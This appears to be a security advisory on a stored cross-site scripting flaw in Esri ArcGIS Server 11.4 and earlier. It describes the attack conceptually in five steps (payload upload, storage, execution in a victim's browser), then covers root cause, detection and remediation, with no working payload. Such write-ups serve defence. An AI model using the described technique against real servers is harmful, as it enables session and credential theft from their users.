Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server versions 11.4 and earlier are vulnerable to a stored cross-site scripting (XSS) attack, allowing attackers to inject malicious JavaScript into the server. This vulnerability enables attackers to compromise user browsers and potentially gain control of user accounts or the server itself. Successful exploitation can lead to data breaches, system compromise, and denial of service.
Step 1: Payload Creation: The attacker crafts a malicious payload containing JavaScript code designed to execute within a victim's browser. This payload is typically designed to steal cookies, redirect users to phishing sites, or execute other malicious actions.
Step 2: Payload Delivery: The attacker uploads the malicious payload, likely disguised as a legitimate file (e.g., an image or a document), to the ArcGIS Server. This is achieved by exploiting a file upload functionality or a web form that doesn't properly sanitize user input.
Step 3: Payload Storage: The ArcGIS Server stores the uploaded file containing the malicious JavaScript code. The server's storage mechanism does not properly sanitize or encode the content of the uploaded file.
Step 4: Victim Interaction: A legitimate user accesses a resource on the ArcGIS Server that triggers the execution of the stored malicious file. This could be by browsing to a specific URL, viewing a map, or interacting with a web application hosted on the server.
Step 5: Payload Execution: The victim's browser executes the malicious JavaScript code embedded within the stored file. This allows the attacker to perform actions within the context of the user's browser, such as stealing credentials, redirecting to phishing sites, or gaining control of the user's session.
The vulnerability stems from insufficient input validation and output encoding within Esri ArcGIS Server. Specifically, the server fails to properly sanitize user-supplied data before storing it and subsequently serving it to other users. This allows an attacker to inject malicious JavaScript code into a file, which is then stored on the server. When a legitimate user accesses the stored file, the malicious JavaScript executes within their browser, enabling the attacker to perform actions on behalf of the user. The root cause is likely a missing or inadequate implementation of HTML encoding or input sanitization on user-supplied data, particularly when handling file uploads or data submitted through web forms. The lack of proper validation allows the attacker to bypass security measures and inject arbitrary code. The specific function or logic flaw is likely related to how the server processes and stores user-uploaded files or data submitted through web forms, failing to properly sanitize potentially malicious content before storing it and serving it to other users.
This vulnerability could be exploited by various threat actors, including financially motivated cybercriminals, nation-state actors, and hacktivists. There is no specific APT group definitively linked to this vulnerability at this time. CISA KEV status: Not listed at this time, but likely to be added if actively exploited.
Network traffic analysis: Look for unusual HTTP requests containing suspicious JavaScript code or HTML tags within file uploads or data submissions to the ArcGIS Server.
Web server logs: Monitor web server logs for suspicious file uploads, especially those with unusual file extensions or content.
File integrity monitoring: Implement file integrity monitoring on the ArcGIS Server to detect any unauthorized changes to files, particularly those related to web applications or user-uploaded content.
Security Information and Event Management (SIEM): Utilize a SIEM system to correlate events from various sources (web server logs, network traffic, etc.) and identify potential XSS attacks.
Browser-based detection: Employ browser extensions or security tools that can detect and block XSS attacks in real-time.
Upgrade to Esri ArcGIS Server version 11.5 or later. This is the primary and most effective remediation step.
Implement robust input validation and output encoding: Ensure that all user-supplied data is properly validated and sanitized to prevent the injection of malicious code. Use HTML encoding to escape special characters when displaying user-provided data.
Implement a Web Application Firewall (WAF): Deploy a WAF to filter malicious traffic and block XSS attacks before they reach the ArcGIS Server.
Regular security audits and penetration testing: Conduct regular security audits and penetration testing to identify and address vulnerabilities in the ArcGIS Server configuration and code.
Restrict file upload functionality: Limit the types of files that can be uploaded and the size of uploaded files. Consider disabling file upload functionality if it is not essential.
Implement Content Security Policy (CSP): Configure CSP headers to restrict the sources from which the browser can load resources, mitigating the impact of XSS attacks.
Keep server software up-to-date: Regularly apply security patches and updates to the operating system and all installed software components.